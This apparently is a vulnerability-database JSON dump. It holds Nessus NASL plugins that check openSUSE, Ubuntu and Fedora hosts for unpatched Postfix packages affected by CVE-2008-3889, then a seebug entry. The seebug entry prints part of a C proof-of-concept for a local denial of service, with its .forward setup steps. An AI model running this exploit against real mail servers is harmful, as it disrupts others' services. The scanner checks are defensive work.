(!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"postfix-2.4.5-20.6\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"postfix-devel-2.4.5-20.6\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"postfix-mysql-2.4.5-20.6\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"postfix-postgresql-2.4.5-20.6\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postfix / postfix-devel / postfix-mysql / postfix-postgresql\");\n}\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:03:39", "description": "When exectuting external programs postfix didn't close the file\ndescriptor of the epoll system call. This could potentially be\nexploited to shutdown postfix (CVE-2008-3889).", "edition": 24, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : postfix (postfix-194)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3889"], "modified": "2009-07-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:postfix-devel", "p-cpe:/a:novell:opensuse:postfix-mysql", "cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:postfix-postgresql", "p-cpe:/a:novell:opensuse:postfix"], "id": "SUSE_11_0_POSTFIX-080912.NASL", "href": "https://www.tenable.com/plugins/nessus/40112", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update postfix-194.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40112);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-3889\");\n\n script_name(english:\"openSUSE Security Update : postfix (postfix-194)\");\n script_summary(english:\"Check for the postfix-194 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"When exectuting external programs postfix didn't close the file\ndescriptor of the epoll system call. This could potentially be\nexploited to shutdown postfix (CVE-2008-3889).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=421847\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postfix packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postfix-2.5.1-28.5\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postfix-devel-2.5.1-28.5\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postfix-mysql-2.5.1-28.5\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postfix-postgresql-2.5.1-28.5\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postfix / postfix-devel / postfix-mysql / postfix-postgresql\");\n}\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-20T15:44:15", "description": "Wietse Venema discovered that Postfix leaked internal file descriptors\nwhen executing non-Postfix commands. A local attacker could exploit\nthis to cause Postfix to run out of descriptors, leading to a denial\nof service.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2009-04-23T00:00:00", "title": "Ubuntu 7.10 / 8.04 LTS : postfix vulnerability (USN-642-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3889"], "modified": "2009-04-23T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:7.10", "p-cpe:/a:canonical:ubuntu_linux:postfix-ldap", "p-cpe:/a:canonical:ubuntu_linux:postfix-pcre", "p-cpe:/a:canonical:ubuntu_linux:postfix-dev", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:postfix-mysql", "p-cpe:/a:canonical:ubuntu_linux:postfix-cdb", "p-cpe:/a:canonical:ubuntu_linux:postfix-doc", "p-cpe:/a:canonical:ubuntu_linux:postfix", "p-cpe:/a:canonical:ubuntu_linux:postfix-pgsql"], "id": "UBUNTU_USN-642-1.NASL", "href": "https://www.tenable.com/plugins/nessus/36904", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-642-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36904);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2008-3889\");\n script_bugtraq_id(30977);\n script_xref(name:\"USN\", value:\"642-1\");\n\n script_name(english:\"Ubuntu 7.10 / 8.04 LTS : postfix vulnerability (USN-642-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Wietse Venema discovered that Postfix leaked internal file descriptors\nwhen executing non-Postfix commands. A local attacker could exploit\nthis to cause Postfix to run out of descriptors, leading to a denial\nof service.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/642-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix-cdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix-pcre\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(7\\.10|8\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 7.10 / 8.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix\", pkgver:\"2.4.5-3ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix-cdb\", pkgver:\"2.4.5-3ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix-dev\", pkgver:\"2.4.5-3ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix-doc\", pkgver:\"2.4.5-3ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix-ldap\", pkgver:\"2.4.5-3ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix-mysql\", pkgver:\"2.4.5-3ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix-pcre\", pkgver:\"2.4.5-3ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix-pgsql\", pkgver:\"2.4.5-3ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix\", pkgver:\"2.5.1-2ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix-cdb\", pkgver:\"2.5.1-2ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix-dev\", pkgver:\"2.5.1-2ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix-doc\", pkgver:\"2.5.1-2ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix-ldap\", pkgver:\"2.5.1-2ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix-mysql\", pkgver:\"2.5.1-2ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix-pcre\", pkgver:\"2.5.1-2ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix-pgsql\", pkgver:\"2.5.1-2ubuntu1.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postfix / postfix-cdb / postfix-dev / postfix-doc / postfix-ldap / etc\");\n}\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T10:06:42", "description": "New upstream patch level version 2.5.5, including multiple security\nfixes detailed in upstream announcements:\nhttp://www.postfix.org/announcements/20080814.html\nhttp://www.postfix.org/announcements/20080902.html\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2008-10-10T00:00:00", "title": "Fedora 8 : postfix-2.5.5-1.fc8 (2008-8595)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3889", "CVE-2008-2937", "CVE-2008-2936"], "modified": "2008-10-10T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:8", "p-cpe:/a:fedoraproject:fedora:postfix"], "id": "FEDORA_2008-8595.NASL", "href": "https://www.tenable.com/plugins/nessus/34377", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-8595.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34377);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-2936\", \"CVE-2008-2937\", \"CVE-2008-3889\");\n script_bugtraq_id(30691, 30977);\n script_xref(name:\"FEDORA\", value:\"2008-8595\");\n\n script_name(english:\"Fedora 8 : postfix-2.5.5-1.fc8 (2008-8595)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New upstream patch level version 2.5.5, including multiple security\nfixes detailed in upstream announcements:\nhttp://www.postfix.org/announcements/20080814.html\nhttp://www.postfix.org/announcements/20080902.html\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.postfix.org/announcements/20080814.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.postfix.org/announcements/20080902.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=456314\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=456347\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=460906\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-October/015211.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ebd7c54f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postfix package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(20, 200, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:8\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 8.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC8\", reference:\"postfix-2.5.5-1.fc8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postfix\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:06:42", "description": "New upstream patch level version 2.5.5, including multiple security\nfixes detailed in upstream announcements:\nhttp://www.postfix.org/announcements/20080814.html\nhttp://www.postfix.org/announcements/20080902.html\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2008-10-10T00:00:00", "title": "Fedora 9 : postfix-2.5.5-1.fc9 (2008-8593)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3889", "CVE-2008-2937", "CVE-2008-2936"], "modified": "2008-10-10T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:postfix", "cpe:/o:fedoraproject:fedora:9"], "id": "FEDORA_2008-8593.NASL", "href": "https://www.tenable.com/plugins/nessus/34376", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-8593.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34376);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-2936\", \"CVE-2008-2937\", \"CVE-2008-3889\");\n script_bugtraq_id(30691, 30977);\n script_xref(name:\"FEDORA\", value:\"2008-8593\");\n\n script_name(english:\"Fedora 9 : postfix-2.5.5-1.fc9 (2008-8593)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New upstream patch level version 2.5.5, including multiple security\nfixes detailed in upstream announcements:\nhttp://www.postfix.org/announcements/20080814.html\nhttp://www.postfix.org/announcements/20080902.html\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.postfix.org/announcements/20080814.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.postfix.org/announcements/20080902.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=456314\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=456347\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=460906\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-October/015227.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c386e55d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postfix package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(20, 200, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:9\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 9.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC9\", reference:\"postfix-2.5.5-1.fc9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postfix\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T16:14:12", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Postfix < 2.4.9, 2.5.5, 2.6-20080902 - (.forward) Local DoS Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3889", "CVE-2008-4042"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-65714", "id": "SSV:65714", "sourceData": "\n /*\r\n * http://www.wekk.net/research/CVE-2008-4042/CVE-2008-4042-exploit.c\r\n * http://www.wekk.net/research/CVE-2008-3889/CVE-2008-3889-exploit.c\r\n *\r\n * Exploit for Postfix 2.4 before 2.4.9, 2.5 before 2.5.5, and 2.6 \r\n * before 2.6-20080902, when used with the Linux 2.6 kernel.\r\n *\r\n * CVE-2008-3889 & CVE-2008-4042\r\n *\r\n * by Albert Sellar\u00e8s <whats[at]wekk[dot]net> - http://www.wekk.net\r\n * and Marc Morata Fit\u00e9 <marc.morata.fite[at]gmail[dot]com> \r\n * 2008-09-16\r\n *\r\n * This Proof of concept creates a pipe and adds it in the postfix's epoll \r\n * file descriptor.\r\n * When the pipe is added, an endless loop will launch lots of events to the \r\n * local and master postfix processes. \r\n * This will slowdown de system a lot.\r\n *\r\n * An example of use:\r\n * 1- Put the content "| ~/CVE-2008-3889-exploit >> /tmp/postfix.log &" (with \r\n * the double quotes) \r\n * in the file ~/.forward\r\n *\r\n * 2- Put the CVE-2008-4042-exploit in your home\r\n * gcc CVE-2008-3889-exploit.c -o CVE-2008-3889-exploit\r\n *\r\n * 3- Send and email to the user\r\n *\r\n * You can see the output at /tmp/postfix.log\r\n */\r\n\r\n\r\n#include <sys/epoll.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <unistd.h>\r\n#include <dirent.h>\r\n#include <errno.h>\r\n\r\n#define FDOPEN 200\r\n\r\n\r\nvoid add_fd(int fde, int fd) {\r\n\tprintf("[*] Adding fd %d to eventpoll %d\\n", fd, fde);\r\n\tstatic struct epoll_event ev;\r\n\tev.events = EPOLLIN|EPOLLOUT|EPOLLPRI|EPOLLERR|EPOLLHUP|EPOLLET;\r\n\terrno =0;\r\n\t// If this is a socket fd, the load is high\r\n\tev.data.u32 = 6;\r\n\tev.data.u64 = 6;\r\n\r\n\tif (epoll_ctl(fde, EPOLL_CTL_ADD, fd, &ev) == 0) {\r\n\t\tprintf(" => Fd %d added!\\n", fd);\r\n\t} else {\r\n\t\tprintf(" => Error (%d) adding fd %d\\n", errno, fd);\r\n\t}\r\n}\r\n\r\nint main(int argc, char *argv[]) {\r\n\r\n\tint fds[2];\r\n\tchar dir[32], c;\r\n\tint 